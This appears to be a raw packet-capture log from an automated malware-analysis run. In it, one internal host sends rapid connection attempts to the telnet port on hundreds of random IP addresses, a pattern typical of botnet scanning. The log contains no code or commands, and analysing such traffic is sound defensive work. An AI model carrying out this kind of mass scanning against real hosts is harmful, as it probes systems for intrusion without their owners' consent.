                                              Nov 23, 2023 05:14:48.995572090 CET4782823192.168.2.14251.34.142.96
                                              Nov 23, 2023 05:14:48.995577097 CET4782823192.168.2.14147.64.182.52
                                              Nov 23, 2023 05:14:48.995594978 CET4782823192.168.2.14107.162.16.188
                                              Nov 23, 2023 05:14:48.995596886 CET4782823192.168.2.14246.228.85.216
                                              Nov 23, 2023 05:14:48.995596886 CET4782823192.168.2.14222.131.4.166
                                              Nov 23, 2023 05:14:48.995596886 CET4782823192.168.2.14110.214.87.44
                                              Nov 23, 2023 05:14:48.995604038 CET4782823192.168.2.1489.84.7.136
                                              Nov 23, 2023 05:14:48.995623112 CET4782823192.168.2.14176.36.239.102
                                              Nov 23, 2023 05:14:48.995623112 CET4782823192.168.2.14187.159.251.218
                                              Nov 23, 2023 05:14:48.995625973 CET4782823192.168.2.1495.196.9.99
                                              Nov 23, 2023 05:14:48.995645046 CET4782823192.168.2.14157.28.178.138
                                              Nov 23, 2023 05:14:48.995645046 CET4782823192.168.2.14212.252.126.55
                                              Nov 23, 2023 05:14:48.995666981 CET4782823192.168.2.14254.122.245.227
                                              Nov 23, 2023 05:14:48.995672941 CET4782823192.168.2.1446.180.143.125
                                              Nov 23, 2023 05:14:48.995677948 CET4782823192.168.2.14206.186.26.249
                                              Nov 23, 2023 05:14:48.995686054 CET4782823192.168.2.1423.22.80.88
                                              Nov 23, 2023 05:14:48.995690107 CET4782823192.168.2.1479.192.181.239
                                              Nov 23, 2023 05:14:48.995690107 CET4782823192.168.2.14183.24.111.197
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.1414.61.181.70
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.14113.233.137.147
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.14152.233.61.201
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.14187.133.135.149
                                              Nov 23, 2023 05:14:48.995696068 CET4782823192.168.2.1424.71.41.116
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.1416.38.224.116
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.1446.219.142.122
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.1440.151.45.179
                                              Nov 23, 2023 05:14:48.995692968 CET4782823192.168.2.1418.25.218.169
                                              Nov 23, 2023 05:14:48.995706081 CET4782823192.168.2.14117.201.137.198
                                              Nov 23, 2023 05:14:48.995717049 CET4782823192.168.2.14206.196.39.92
                                              Nov 23, 2023 05:14:48.995718002 CET4782823192.168.2.14155.28.207.234
                                              Nov 23, 2023 05:14:48.995721102 CET4782823192.168.2.1416.22.72.28
                                              Nov 23, 2023 05:14:48.995731115 CET4782823192.168.2.1414.250.18.89
                                              Nov 23, 2023 05:14:48.995734930 CET4782823192.168.2.14245.23.163.21
                                              Nov 23, 2023 05:14:48.995735884 CET4782823192.168.2.14196.255.112.104
                                              Nov 23, 2023 05:14:48.995738983 CET4782823192.168.2.14108.43.86.166
                                              Nov 23, 2023 05:14:48.995750904 CET4782823192.168.2.1418.104.31.239
                                              Nov 23, 2023 05:14:48.995757103 CET4782823192.168.2.14116.59.14.75
                                              Nov 23, 2023 05:14:48.995759010 CET4782823192.168.2.1480.130.170.189
                                              Nov 23, 2023 05:14:48.995759010 CET4782823192.168.2.1461.42.188.120
                                              Nov 23, 2023 05:14:48.995759010 CET4782823192.168.2.1414.51.95.2
                                              Nov 23, 2023 05:14:48.995759010 CET4782823192.168.2.14160.27.178.94
                                              Nov 23, 2023 05:14:48.995767117 CET4782823192.168.2.14210.98.147.67
                                              Nov 23, 2023 05:14:48.995768070 CET4782823192.168.2.14164.127.26.102
                                              Nov 23, 2023 05:14:48.995768070 CET4782823192.168.2.14133.132.137.38
                                              Nov 23, 2023 05:14:48.995775938 CET4782823192.168.2.1432.153.113.143
                                              Nov 23, 2023 05:14:48.995779037 CET4782823192.168.2.1458.90.111.115
                                              Nov 23, 2023 05:14:48.995779991 CET4782823192.168.2.14166.12.54.30
                                              Nov 23, 2023 05:14:48.995781898 CET4782823192.168.2.14120.249.19.89
                                              Nov 23, 2023 05:14:48.995793104 CET4782823192.168.2.1492.85.235.4
                                              Nov 23, 2023 05:14:48.995795965 CET4782823192.168.2.14189.46.77.152
                                              Nov 23, 2023 05:14:48.995800018 CET4782823192.168.2.1460.208.66.52
                                              Nov 23, 2023 05:14:48.995800018 CET4782823192.168.2.14221.10.165.5
                                              Nov 23, 2023 05:14:48.995804071 CET4782823192.168.2.1453.80.228.187
                                              Nov 23, 2023 05:14:48.995805979 CET4782823192.168.2.142.83.151.174
                                              Nov 23, 2023 05:14:48.995810986 CET4782823192.168.2.14149.240.54.197
                                              Nov 23, 2023 05:14:48.995820999 CET4782823192.168.2.14249.158.57.231
                                              Nov 23, 2023 05:14:48.995825052 CET4782823192.168.2.14195.228.202.190
                                              Nov 23, 2023 05:14:48.995825052 CET4782823192.168.2.14187.244.82.3
                                              Nov 23, 2023 05:14:48.995825052 CET4782823192.168.2.14253.252.23.151
                                              Nov 23, 2023 05:14:48.995825052 CET4782823192.168.2.14119.138.251.183
                                              Nov 23, 2023 05:14:48.995843887 CET4782823192.168.2.145.164.219.153
                                              Nov 23, 2023 05:14:48.995843887 CET4782823192.168.2.14191.53.9.32
                                              Nov 23, 2023 05:14:48.995846987 CET4782823192.168.2.14165.112.192.88
                                              Nov 23, 2023 05:14:48.995846987 CET4782823192.168.2.14104.189.58.204
                                              Nov 23, 2023 05:14:48.995846987 CET4782823192.168.2.14158.94.105.166
                                              Nov 23, 2023 05:14:48.995851040 CET4782823192.168.2.148.17.240.105
                                              Nov 23, 2023 05:14:48.995860100 CET4782823192.168.2.1461.37.84.54
                                              Nov 23, 2023 05:14:48.995861053 CET4782823192.168.2.149.5.187.107
                                              Nov 23, 2023 05:14:48.995862961 CET4782823192.168.2.14108.99.53.86
                                              Nov 23, 2023 05:14:48.995876074 CET4782823192.168.2.1435.233.214.131
                                              Nov 23, 2023 05:14:48.995877981 CET4782823192.168.2.144.88.145.180
                                              Nov 23, 2023 05:14:48.995877981 CET4782823192.168.2.14191.211.191.18
                                              Nov 23, 2023 05:14:48.995883942 CET4782823192.168.2.14175.148.233.125
                                              Nov 23, 2023 05:14:48.995889902 CET4782823192.168.2.14240.206.51.208
                                              Nov 23, 2023 05:14:48.995893955 CET4782823192.168.2.1437.149.166.58
                                              Nov 23, 2023 05:14:48.995894909 CET4782823192.168.2.1412.246.253.231
                                              Nov 23, 2023 05:14:48.995903969 CET4782823192.168.2.1498.154.39.91
                                              Nov 23, 2023 05:14:48.995904922 CET4782823192.168.2.148.54.152.76
                                              Nov 23, 2023 05:14:48.995906115 CET4782823192.168.2.14154.217.29.182
                                              Nov 23, 2023 05:14:48.995907068 CET4782823192.168.2.14223.218.35.60
                                              Nov 23, 2023 05:14:48.995913982 CET4782823192.168.2.14191.68.187.56
                                              Nov 23, 2023 05:14:48.995913982 CET4782823192.168.2.14195.92.34.78
                                              Nov 23, 2023 05:14:48.995918989 CET4782823192.168.2.1473.197.215.21
                                              Nov 23, 2023 05:14:48.995920897 CET4782823192.168.2.14160.66.232.22
                                              Nov 23, 2023 05:14:48.995934963 CET4782823192.168.2.1493.111.235.172
                                              Nov 23, 2023 05:14:48.995935917 CET4782823192.168.2.1461.209.68.181
                                              Nov 23, 2023 05:14:48.995937109 CET4782823192.168.2.1472.184.199.49
                                              Nov 23, 2023 05:14:48.995945930 CET4782823192.168.2.14197.174.138.37
                                              Nov 23, 2023 05:14:48.995959044 CET4782823192.168.2.1491.150.172.246
                                              Nov 23, 2023 05:14:48.995961905 CET4782823192.168.2.14174.187.147.229
                                              Nov 23, 2023 05:14:48.995966911 CET4782823192.168.2.1440.188.125.222
                                              Nov 23, 2023 05:14:48.995971918 CET4782823192.168.2.1447.133.1.93
                                              Nov 23, 2023 05:14:48.995980024 CET4782823192.168.2.14109.70.200.160
                                              Nov 23, 2023 05:14:48.995979071 CET4782823192.168.2.1443.21.222.103
                                              Nov 23, 2023 05:14:48.995982885 CET4782823192.168.2.1472.215.4.63
                                              Nov 23, 2023 05:14:48.996006012 CET4782823192.168.2.1453.60.175.81
                                              Nov 23, 2023 05:14:48.996010065 CET4782823192.168.2.14151.62.36.85
                                              Nov 23, 2023 05:14:48.996021032 CET4782823192.168.2.14205.224.55.184
                                              Nov 23, 2023 05:14:48.996021986 CET4782823192.168.2.14116.185.40.186
                                              Nov 23, 2023 05:14:48.996021986 CET4782823192.168.2.14217.119.176.247
                                              Nov 23, 2023 05:14:48.996026993 CET4782823192.168.2.1440.104.72.12
                                              Nov 23, 2023 05:14:48.996028900 CET4782823192.168.2.14124.16.179.51
                                              Nov 23, 2023 05:14:48.996028900 CET4782823192.168.2.1482.124.114.156
                                              Nov 23, 2023 05:14:48.996043921 CET4782823192.168.2.1487.88.79.180
                                              Nov 23, 2023 05:14:48.996046066 CET4782823192.168.2.14206.223.91.226
                                              Nov 23, 2023 05:14:48.996046066 CET4782823192.168.2.1461.204.37.202
                                              Nov 23, 2023 05:14:48.996051073 CET4782823192.168.2.14254.140.217.108
                                              Nov 23, 2023 05:14:48.996056080 CET4782823192.168.2.14192.37.29.94
                                              Nov 23, 2023 05:14:48.996057987 CET4782823192.168.2.14148.104.165.142
                                              Nov 23, 2023 05:14:48.996057987 CET4782823192.168.2.1453.240.97.65
                                              Nov 23, 2023 05:14:48.996057987 CET4782823192.168.2.14126.249.150.169
                                              Nov 23, 2023 05:14:48.996057987 CET4782823192.168.2.1496.192.247.21
                                              Nov 23, 2023 05:14:48.996057987 CET4782823192.168.2.14252.65.16.62
                                              Nov 23, 2023 05:14:48.996062994 CET4782823192.168.2.144.121.229.178
                                              Nov 23, 2023 05:14:48.996062994 CET4782823192.168.2.1454.41.6.180
                                              Nov 23, 2023 05:14:48.996062994 CET4782823192.168.2.1445.195.239.2
                                              Nov 23, 2023 05:14:48.996062994 CET4782823192.168.2.14200.240.238.213
                                              Nov 23, 2023 05:14:48.996062994 CET4782823192.168.2.14196.179.246.93
                                              Nov 23, 2023 05:14:48.996062994 CET4782823192.168.2.14208.70.232.255
                                              Nov 23, 2023 05:14:48.996068954 CET4782823192.168.2.14123.99.74.169
                                              Nov 23, 2023 05:14:48.996085882 CET4782823192.168.2.1476.208.119.84
                                              Nov 23, 2023 05:14:48.996088982 CET4782823192.168.2.1472.227.34.102
                                              Nov 23, 2023 05:14:48.996088982 CET4782823192.168.2.1439.151.239.211
                                              Nov 23, 2023 05:14:48.996089935 CET4782823192.168.2.1439.5.205.195
                                              Nov 23, 2023 05:14:48.996100903 CET4782823192.168.2.1479.117.213.6
                                              Nov 23, 2023 05:14:48.996100903 CET4782823192.168.2.14217.36.220.59
                                              Nov 23, 2023 05:14:48.996109962 CET4782823192.168.2.14116.82.118.147
                                              Nov 23, 2023 05:14:48.996118069 CET4782823192.168.2.1439.75.86.173
                                              Nov 23, 2023 05:14:48.996119022 CET4782823192.168.2.14167.107.84.119
                                              Nov 23, 2023 05:14:48.996134043 CET4782823192.168.2.1427.177.175.40
                                              Nov 23, 2023 05:14:48.996134043 CET4782823192.168.2.1481.41.247.180
                                              Nov 23, 2023 05:14:48.996134996 CET4782823192.168.2.14201.71.63.138
                                              Nov 23, 2023 05:14:48.996134996 CET4782823192.168.2.14194.94.97.242
                                              Nov 23, 2023 05:14:48.996139050 CET4782823192.168.2.1457.27.120.53
                                              Nov 23, 2023 05:14:48.996150970 CET4782823192.168.2.145.235.130.198
                                              Nov 23, 2023 05:14:48.996151924 CET4782823192.168.2.14201.238.93.184
                                              Nov 23, 2023 05:14:48.996155024 CET4782823192.168.2.144.142.156.242
                                              Nov 23, 2023 05:14:48.996175051 CET4782823192.168.2.14216.17.12.63
                                              Nov 23, 2023 05:14:48.996180058 CET4782823192.168.2.1442.144.222.207
                                              Nov 23, 2023 05:14:48.996190071 CET4782823192.168.2.14158.24.63.203
                                              Nov 23, 2023 05:14:48.996198893 CET4782823192.168.2.14114.40.240.97
                                              Nov 23, 2023 05:14:48.996198893 CET4782823192.168.2.1463.65.197.72
                                              Nov 23, 2023 05:14:48.996222019 CET4782823192.168.2.14251.195.183.59
                                              Nov 23, 2023 05:14:48.996225119 CET4782823192.168.2.1435.81.213.5
                                              Nov 23, 2023 05:14:48.996227026 CET4782823192.168.2.14133.56.123.125
                                              Nov 23, 2023 05:14:48.996227026 CET4782823192.168.2.14107.204.217.20
                                              Nov 23, 2023 05:14:48.996233940 CET4782823192.168.2.14251.200.191.129
                                              Nov 23, 2023 05:14:48.996237040 CET4782823192.168.2.14198.140.26.83
                                              Nov 23, 2023 05:14:48.996248960 CET4782823192.168.2.1494.135.249.238
                                              Nov 23, 2023 05:14:48.996248960 CET4782823192.168.2.142.243.94.171
                                              Nov 23, 2023 05:14:48.996248960 CET4782823192.168.2.1432.112.150.242
                                              Nov 23, 2023 05:14:48.996259928 CET4782823192.168.2.1476.156.102.178
                                              Nov 23, 2023 05:14:48.996279001 CET4782823192.168.2.14170.137.217.148
                                              Nov 23, 2023 05:14:48.996289968 CET4782823192.168.2.14240.49.140.1
                                              Nov 23, 2023 05:14:48.996299028 CET4782823192.168.2.14252.253.76.239
                                              Nov 23, 2023 05:14:48.996299028 CET4782823192.168.2.14196.231.91.179
                                              Nov 23, 2023 05:14:48.996299028 CET4782823192.168.2.14141.78.120.59
                                              Nov 23, 2023 05:14:48.996309996 CET4782823192.168.2.14253.58.226.158
                                              Nov 23, 2023 05:14:48.996313095 CET4782823192.168.2.14123.117.173.75
                                              Nov 23, 2023 05:14:48.996313095 CET4782823192.168.2.1470.4.88.206
                                              Nov 23, 2023 05:14:48.996319056 CET4782823192.168.2.14240.214.67.167
                                              Nov 23, 2023 05:14:48.996320009 CET4782823192.168.2.1445.147.231.64
                                              Nov 23, 2023 05:14:48.996320009 CET4782823192.168.2.1486.220.63.75
                                              Nov 23, 2023 05:14:48.996320009 CET4782823192.168.2.14178.194.170.118
                                              Nov 23, 2023 05:14:48.996320963 CET4782823192.168.2.1442.173.3.252
                                              Nov 23, 2023 05:14:48.996319056 CET4782823192.168.2.14167.199.103.106
                                              Nov 23, 2023 05:14:48.996320963 CET4782823192.168.2.14187.21.194.178
                                              Nov 23, 2023 05:14:48.996319056 CET4782823192.168.2.14176.166.183.158
                                              Nov 23, 2023 05:14:48.996320963 CET4782823192.168.2.14109.56.235.100
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.14175.111.183.243
                                              Nov 23, 2023 05:14:48.996324062 CET4782823192.168.2.14249.154.137.198
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.1476.56.128.41
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.14179.70.129.194
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.14219.0.148.212
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.1419.99.23.151
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:48.996323109 CET4782823192.168.2.14125.255.168.49
                                              Nov 23, 2023 05:14:48.996330023 CET4782823192.168.2.14113.174.243.170
                                              Nov 23, 2023 05:14:48.996331930 CET4782823192.168.2.14247.132.60.139
                                              Nov 23, 2023 05:14:48.996340990 CET4782823192.168.2.1461.240.75.174
                                              Nov 23, 2023 05:14:48.996345043 CET4782823192.168.2.14160.24.141.27
                                              Nov 23, 2023 05:14:48.996350050 CET4782823192.168.2.14145.51.155.186
                                              Nov 23, 2023 05:14:48.996371031 CET4782823192.168.2.14223.67.20.56
                                              Nov 23, 2023 05:14:48.996371984 CET4782823192.168.2.1493.5.50.192
                                              Nov 23, 2023 05:14:48.996387959 CET4782823192.168.2.14161.107.193.113
                                              Nov 23, 2023 05:14:48.996387959 CET4782823192.168.2.14178.249.97.247
                                              Nov 23, 2023 05:14:48.996390104 CET4782823192.168.2.1447.76.134.236
                                              Nov 23, 2023 05:14:48.996390104 CET4782823192.168.2.1483.243.10.186
                                              Nov 23, 2023 05:14:48.996397972 CET4782823192.168.2.1444.48.146.170
                                              Nov 23, 2023 05:14:48.996402025 CET4782823192.168.2.14186.184.148.17
                                              Nov 23, 2023 05:14:48.996409893 CET4782823192.168.2.1469.75.226.79
                                              Nov 23, 2023 05:14:48.996411085 CET4782823192.168.2.14244.247.61.68
                                              Nov 23, 2023 05:14:48.996411085 CET4782823192.168.2.1435.60.108.72
                                              Nov 23, 2023 05:14:48.996411085 CET4782823192.168.2.14222.142.244.14
                                              Nov 23, 2023 05:14:48.996414900 CET4782823192.168.2.14211.253.5.149
                                              Nov 23, 2023 05:14:48.996414900 CET4782823192.168.2.1431.28.240.106
                                              Nov 23, 2023 05:14:48.996414900 CET4782823192.168.2.1418.12.244.56
                                              Nov 23, 2023 05:14:48.996423960 CET4782823192.168.2.1439.185.153.132
                                              Nov 23, 2023 05:14:48.996429920 CET4782823192.168.2.1491.208.136.217
                                              Nov 23, 2023 05:14:48.996429920 CET4782823192.168.2.14154.2.144.19
                                              Nov 23, 2023 05:14:48.996431112 CET4782823192.168.2.14173.39.212.113
                                              Nov 23, 2023 05:14:48.996432066 CET4782823192.168.2.14103.224.241.25
                                              Nov 23, 2023 05:14:48.996438026 CET4782823192.168.2.14155.252.189.54
                                              Nov 23, 2023 05:14:48.996439934 CET4782823192.168.2.14191.39.185.184
                                              Nov 23, 2023 05:14:48.996444941 CET4782823192.168.2.1438.218.86.215
                                              Nov 23, 2023 05:14:48.996460915 CET4782823192.168.2.14206.101.98.102
                                              Nov 23, 2023 05:14:48.996469021 CET4782823192.168.2.14115.41.123.131
                                              Nov 23, 2023 05:14:48.996469975 CET4782823192.168.2.1485.24.89.96
                                              Nov 23, 2023 05:14:48.996469021 CET4782823192.168.2.14196.177.104.104
                                              Nov 23, 2023 05:14:48.996470928 CET4782823192.168.2.14142.185.245.55
                                              Nov 23, 2023 05:14:48.996470928 CET4782823192.168.2.1417.246.50.94
                                              Nov 23, 2023 05:14:48.996476889 CET4782823192.168.2.14190.5.5.65
                                              Nov 23, 2023 05:14:48.996496916 CET4782823192.168.2.1440.79.53.13
                                              Nov 23, 2023 05:14:48.996498108 CET4782823192.168.2.14192.36.84.114
                                              Nov 23, 2023 05:14:48.996498108 CET4782823192.168.2.14112.100.47.40
                                              Nov 23, 2023 05:14:48.996498108 CET4782823192.168.2.14167.208.194.69
                                              Nov 23, 2023 05:14:48.996500015 CET4782823192.168.2.14118.92.37.156
                                              Nov 23, 2023 05:14:48.996500015 CET4782823192.168.2.14250.51.110.109
                                              Nov 23, 2023 05:14:48.996500015 CET4782823192.168.2.1476.76.253.58
                                              Nov 23, 2023 05:14:48.996501923 CET4782823192.168.2.14191.126.196.251
                                              Nov 23, 2023 05:14:48.996507883 CET4782823192.168.2.14123.199.142.34
                                              Nov 23, 2023 05:14:48.996519089 CET4782823192.168.2.14241.6.64.37
                                              Nov 23, 2023 05:14:48.996535063 CET4782823192.168.2.14136.46.112.20
                                              Nov 23, 2023 05:14:48.996535063 CET4782823192.168.2.1478.65.169.223
                                              Nov 23, 2023 05:14:48.996535063 CET4782823192.168.2.1474.69.113.194
                                              Nov 23, 2023 05:14:48.996535063 CET4782823192.168.2.14170.162.113.220
                                              Nov 23, 2023 05:14:48.996536970 CET4782823192.168.2.1483.7.163.112
                                              Nov 23, 2023 05:14:48.996536970 CET4782823192.168.2.1465.171.80.97
                                              Nov 23, 2023 05:14:48.996563911 CET4782823192.168.2.144.104.113.11
                                              Nov 23, 2023 05:14:48.996566057 CET4782823192.168.2.14198.78.111.132
                                              Nov 23, 2023 05:14:48.996566057 CET4782823192.168.2.14175.240.236.84
                                              Nov 23, 2023 05:14:48.996573925 CET4782823192.168.2.1495.232.183.70
                                              Nov 23, 2023 05:14:48.996582031 CET4782823192.168.2.14193.60.2.131
                                              Nov 23, 2023 05:14:48.996584892 CET4782823192.168.2.1427.158.180.136
                                              Nov 23, 2023 05:14:48.996587992 CET4782823192.168.2.14110.228.179.108
                                              Nov 23, 2023 05:14:48.996604919 CET4782823192.168.2.14168.42.66.238
                                              Nov 23, 2023 05:14:48.996604919 CET4782823192.168.2.1435.76.171.56
                                              Nov 23, 2023 05:14:48.996613979 CET4782823192.168.2.1417.172.182.156
                                              Nov 23, 2023 05:14:48.996613979 CET4782823192.168.2.14143.24.38.231
                                              Nov 23, 2023 05:14:48.996617079 CET4782823192.168.2.1471.142.72.32
                                              Nov 23, 2023 05:14:48.996618986 CET4782823192.168.2.14161.59.253.14
                                              Nov 23, 2023 05:14:48.996618986 CET4782823192.168.2.1472.59.234.156
                                              Nov 23, 2023 05:14:48.996623993 CET4782823192.168.2.14118.6.97.108
                                              Nov 23, 2023 05:14:48.996623993 CET4782823192.168.2.1494.20.197.6
                                              Nov 23, 2023 05:14:48.996623993 CET4782823192.168.2.14169.27.168.227
                                              Nov 23, 2023 05:14:48.996623993 CET4782823192.168.2.1418.167.129.159
                                              Nov 23, 2023 05:14:48.996625900 CET4782823192.168.2.1490.142.34.77
                                              Nov 23, 2023 05:14:48.996625900 CET4782823192.168.2.1492.221.11.156
                                              Nov 23, 2023 05:14:48.996625900 CET4782823192.168.2.14105.142.122.242
                                              Nov 23, 2023 05:14:48.996642113 CET4782823192.168.2.14159.50.226.34
                                              Nov 23, 2023 05:14:48.996653080 CET4782823192.168.2.1423.203.245.165
                                              Nov 23, 2023 05:14:48.996653080 CET4782823192.168.2.14186.181.8.31
                                              Nov 23, 2023 05:14:48.996659994 CET4782823192.168.2.1460.153.9.217
                                              Nov 23, 2023 05:14:48.996659994 CET4782823192.168.2.14161.7.103.15
                                              Nov 23, 2023 05:14:48.996665955 CET4782823192.168.2.1443.119.76.150
                                              Nov 23, 2023 05:14:48.996665955 CET4782823192.168.2.14193.148.254.55
                                              Nov 23, 2023 05:14:48.996666908 CET4782823192.168.2.1475.169.246.171
                                              Nov 23, 2023 05:14:48.996675014 CET4782823192.168.2.1437.28.205.200
                                              Nov 23, 2023 05:14:48.996680021 CET4782823192.168.2.14107.122.30.64
                                              Nov 23, 2023 05:14:48.996680021 CET4782823192.168.2.14154.35.39.196
                                              Nov 23, 2023 05:14:48.996680021 CET4782823192.168.2.14107.141.128.40
                                              Nov 23, 2023 05:14:48.996697903 CET4782823192.168.2.1486.17.25.190
                                              Nov 23, 2023 05:14:48.996699095 CET4782823192.168.2.14107.152.42.67
                                              Nov 23, 2023 05:14:48.996699095 CET4782823192.168.2.1484.236.19.88
                                              Nov 23, 2023 05:14:48.996699095 CET4782823192.168.2.14168.154.158.72
                                              Nov 23, 2023 05:14:48.996716976 CET4782823192.168.2.14161.212.197.109
                                              Nov 23, 2023 05:14:48.996721029 CET4782823192.168.2.14249.223.219.216
                                              Nov 23, 2023 05:14:48.996728897 CET4782823192.168.2.1477.71.192.148
                                              Nov 23, 2023 05:14:48.996731043 CET4782823192.168.2.14195.81.6.131
                                              Nov 23, 2023 05:14:48.996746063 CET4782823192.168.2.1453.3.138.55
                                              Nov 23, 2023 05:14:48.996750116 CET4782823192.168.2.1487.153.190.106
                                              Nov 23, 2023 05:14:48.996750116 CET4782823192.168.2.1482.194.40.121
                                              Nov 23, 2023 05:14:48.996750116 CET4782823192.168.2.14180.54.158.202
                                              Nov 23, 2023 05:14:48.996757030 CET4782823192.168.2.14113.253.15.234
                                              Nov 23, 2023 05:14:48.996757984 CET4782823192.168.2.14244.95.86.254
                                              Nov 23, 2023 05:14:48.996757984 CET4782823192.168.2.14253.66.2.141
                                              Nov 23, 2023 05:14:48.996771097 CET4782823192.168.2.14123.178.149.82
                                              Nov 23, 2023 05:14:48.996771097 CET4782823192.168.2.1441.110.161.52
                                              Nov 23, 2023 05:14:48.996788979 CET4782823192.168.2.14106.211.214.254
                                              Nov 23, 2023 05:14:48.996793985 CET4782823192.168.2.1482.182.211.209
                                              Nov 23, 2023 05:14:48.996793985 CET4782823192.168.2.1463.237.127.229
                                              Nov 23, 2023 05:14:48.996804953 CET4782823192.168.2.14241.213.59.217
                                              Nov 23, 2023 05:14:48.996804953 CET4782823192.168.2.1496.118.238.229
                                              Nov 23, 2023 05:14:48.996825933 CET4782823192.168.2.14249.11.95.131
                                              Nov 23, 2023 05:14:48.996825933 CET4782823192.168.2.1499.54.26.111
                                              Nov 23, 2023 05:14:48.996826887 CET4782823192.168.2.14125.129.109.75
                                              Nov 23, 2023 05:14:48.996828079 CET4782823192.168.2.1448.236.143.76
                                              Nov 23, 2023 05:14:48.996830940 CET4782823192.168.2.14218.29.176.26
                                              Nov 23, 2023 05:14:48.996831894 CET4782823192.168.2.1471.219.225.209
                                              Nov 23, 2023 05:14:48.996841908 CET4782823192.168.2.14167.180.192.171
                                              Nov 23, 2023 05:14:48.996841908 CET4782823192.168.2.14193.237.243.80
                                              Nov 23, 2023 05:14:48.996846914 CET4782823192.168.2.14219.100.95.169
                                              Nov 23, 2023 05:14:48.996860027 CET4782823192.168.2.1458.136.85.225
                                              Nov 23, 2023 05:14:48.996860981 CET4782823192.168.2.141.237.173.14
                                              Nov 23, 2023 05:14:48.996861935 CET4782823192.168.2.14155.101.216.16
                                              Nov 23, 2023 05:14:48.996866941 CET4782823192.168.2.14101.54.250.177
                                              Nov 23, 2023 05:14:48.996879101 CET4782823192.168.2.14196.213.246.112
                                              Nov 23, 2023 05:14:48.996881962 CET4782823192.168.2.14208.55.241.212
                                              Nov 23, 2023 05:14:48.996885061 CET4782823192.168.2.14198.199.58.226
                                              Nov 23, 2023 05:14:48.996890068 CET4782823192.168.2.14223.76.185.50
                                              Nov 23, 2023 05:14:48.996890068 CET4782823192.168.2.14149.194.71.53
                                              Nov 23, 2023 05:14:48.996902943 CET4782823192.168.2.14243.106.174.10
                                              Nov 23, 2023 05:14:48.996906996 CET4782823192.168.2.14186.91.172.107
                                              Nov 23, 2023 05:14:48.996910095 CET4782823192.168.2.14219.26.173.82
                                              Nov 23, 2023 05:14:48.996911049 CET4782823192.168.2.14114.255.2.187
                                              Nov 23, 2023 05:14:48.996917009 CET4782823192.168.2.14115.33.93.12
                                              Nov 23, 2023 05:14:48.996927023 CET4782823192.168.2.14118.241.172.59
                                              Nov 23, 2023 05:14:48.996927977 CET4782823192.168.2.14182.202.233.59
                                              Nov 23, 2023 05:14:48.996927977 CET4782823192.168.2.1439.251.171.206
                                              Nov 23, 2023 05:14:48.996928930 CET4782823192.168.2.1431.186.62.117
                                              Nov 23, 2023 05:14:48.996943951 CET4782823192.168.2.14116.232.6.89
                                              Nov 23, 2023 05:14:48.996943951 CET4782823192.168.2.1470.113.23.88
                                              Nov 23, 2023 05:14:48.996952057 CET4782823192.168.2.14103.102.38.168
                                              Nov 23, 2023 05:14:48.996952057 CET4782823192.168.2.14249.40.59.97
                                              Nov 23, 2023 05:14:48.996958971 CET4782823192.168.2.1460.245.231.53
                                              Nov 23, 2023 05:14:48.996963024 CET4782823192.168.2.1417.110.44.77
                                              Nov 23, 2023 05:14:48.996974945 CET4782823192.168.2.1458.91.116.209
                                              Nov 23, 2023 05:14:48.996979952 CET4782823192.168.2.1493.242.134.249
                                              Nov 23, 2023 05:14:48.996995926 CET4782823192.168.2.1495.26.250.189
                                              Nov 23, 2023 05:14:48.997010946 CET4782823192.168.2.1431.212.218.57
                                              Nov 23, 2023 05:14:48.997023106 CET4782823192.168.2.14128.11.234.38
                                              Nov 23, 2023 05:14:48.997028112 CET4782823192.168.2.1412.102.5.61
                                              Nov 23, 2023 05:14:48.997033119 CET4782823192.168.2.1467.193.47.43
                                              Nov 23, 2023 05:14:48.997036934 CET4782823192.168.2.14178.124.34.88
                                              Nov 23, 2023 05:14:48.997061968 CET4782823192.168.2.14242.118.113.167
                                              Nov 23, 2023 05:14:48.997067928 CET4782823192.168.2.148.185.46.82
                                              Nov 23, 2023 05:14:48.997067928 CET4782823192.168.2.14105.170.54.143
                                              Nov 23, 2023 05:14:48.997075081 CET4782823192.168.2.14155.105.174.89
                                              Nov 23, 2023 05:14:48.997075081 CET4782823192.168.2.141.53.14.16
                                              Nov 23, 2023 05:14:48.997075081 CET4782823192.168.2.14197.45.232.109
                                              Nov 23, 2023 05:14:48.997083902 CET4782823192.168.2.14151.8.221.8
                                              Nov 23, 2023 05:14:48.997087955 CET4782823192.168.2.14103.250.103.171
                                              Nov 23, 2023 05:14:48.997112036 CET4782823192.168.2.1432.13.27.175
                                              Nov 23, 2023 05:14:48.997116089 CET4782823192.168.2.14211.167.75.27
                                              Nov 23, 2023 05:14:48.997123957 CET4782823192.168.2.148.7.84.85
                                              Nov 23, 2023 05:14:48.997124910 CET4782823192.168.2.1464.67.113.88
                                              Nov 23, 2023 05:14:48.997124910 CET4782823192.168.2.14216.253.103.226
                                              Nov 23, 2023 05:14:48.997124910 CET4782823192.168.2.14222.13.241.104
                                              Nov 23, 2023 05:14:48.997124910 CET4782823192.168.2.14164.216.2.194
                                              Nov 23, 2023 05:14:48.997127056 CET4782823192.168.2.1471.79.208.70
                                              Nov 23, 2023 05:14:48.997128010 CET4782823192.168.2.1446.21.194.180
                                              Nov 23, 2023 05:14:48.997128010 CET4782823192.168.2.1457.125.241.93
                                              Nov 23, 2023 05:14:48.997128963 CET4782823192.168.2.14163.115.188.45
                                              Nov 23, 2023 05:14:48.997128963 CET4782823192.168.2.1485.29.127.186
                                              Nov 23, 2023 05:14:48.997134924 CET4782823192.168.2.14183.153.52.154
                                              Nov 23, 2023 05:14:48.997144938 CET4782823192.168.2.14193.222.14.66
                                              Nov 23, 2023 05:14:48.997145891 CET4782823192.168.2.14105.85.239.152
                                              Nov 23, 2023 05:14:48.997147083 CET4782823192.168.2.14174.217.103.240
                                              Nov 23, 2023 05:14:48.997162104 CET4782823192.168.2.1486.72.183.32
